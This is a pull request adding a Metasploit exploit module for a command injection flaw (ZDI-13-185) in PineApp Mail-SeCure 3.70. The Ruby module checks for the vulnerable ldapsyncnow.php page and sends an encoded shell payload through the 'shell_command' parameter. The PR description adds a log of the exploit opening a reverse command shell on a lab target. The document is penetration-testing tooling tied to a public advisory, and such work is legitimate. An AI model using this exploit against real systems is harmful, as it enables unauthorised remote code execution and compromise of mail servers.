### PR TITLE
Add module for ZDI-13-185

### DIFF
--- a/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb
+++ b/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb
@@ -1,0 +1,98 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'PineApp Mail-SeCure ldapsyncnow.php Arbitrary Command Execution',
+			'Description'    => %q{
+					This module exploits a command injection vulnerability on PineApp Mail-SeCure
+				3.70. The vulnerability exists on the ldapsyncnow.php component, due to the insecure
+				usage of the shell_exec() php function. This module has been tested successfully
+				on PineApp Mail-SeCure 3.70.
+			},
+			'Author'         =>
+				[
+					'Dave Weinstein', # Vulnerability discovery
+					'juan vazquez'    # Metasploit module
+				],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-185/']
+				],
+			'Platform'       => ['unix'],
+			'Arch'           => ARCH_CMD,
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'Space'       => 1024,
+					'DisableNops' => true,
+					'Compat'      =>
+						{
+							'PayloadType' => 'cmd',
+							'RequiredCmd' => 'generic perl python telnet'
+						}
+				},
+			'Targets'        =>
+				[
+					[ 'PineApp Mail-SeCure 3.70', { }]
+				],
+			'DefaultOptions' =>
+				{
+					'SSL' => true
+				},
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Jul 26 2013'
+			))
+
+		register_options(
+			[
+				Opt::RPORT(7443)
+			],
+			self.class
+		)
+
+	end
+
+	def my_uri
+		return normalize_uri("/admin/ldapsyncnow.php")
+	end
+
+	def check
+		# Since atm of writing this exploit there isn't patch available,
+		# checking for the vulnerable component should be a reliable test.
+		res = send_request_cgi({
+			'uri' => my_uri,
+			'vars_get' => {
+				'sync_now' =>'1'
+			}
+		})
+		if res and res.code == 200 and res.body =~ /window\.setTimeout\('loaded\(\)', 2500\);/
+			return Exploit::CheckCode::Appears
+		end
+		return Exploit::CheckCode::Safe
+	end
+
+	def exploit
+		print_status("#{rhost}:#{rport} - Executing payload...")
+		send_request_cgi({
+			'uri' => my_uri,
+			'vars_get' => {
+				'sync_now' =>'1', # must be 1 in order to trigger the vulnerability
+				'shell_command' => payload.encoded
+			}
+		})
+	end
+
+end


### PR DESCRIPTION
Tested successfully with PineApp Mail-SeCure 3.70

test result:

```
msf exploit(pineapp_ldapsyncnow_exec) > check
[*] The target appears to be vulnerable.
msf exploit(pineapp_ldapsyncnow_exec) > exploit

[*] Started reverse double handler
[*] 192.168.24.24:7443 - Executing payload...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo JCuVOpG73Ahh9sXy;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\nJCuVOpG73Ahh9sXy\r\n"
id
[*] Matching...
[*] B is input...
[*] Command shell session 4 opened (192.168.24.21:4444 -> 192.168.24.24:57674) at 2013-07-27 12:10:56 -0500

uid=1005(qmailq) gid=102(qmail) groups=102(qmail)
^C
Abort session 4? [y/N]  y

[*] 192.168.24.24 - Command shell session 4 closed.  Reason: User exit

```
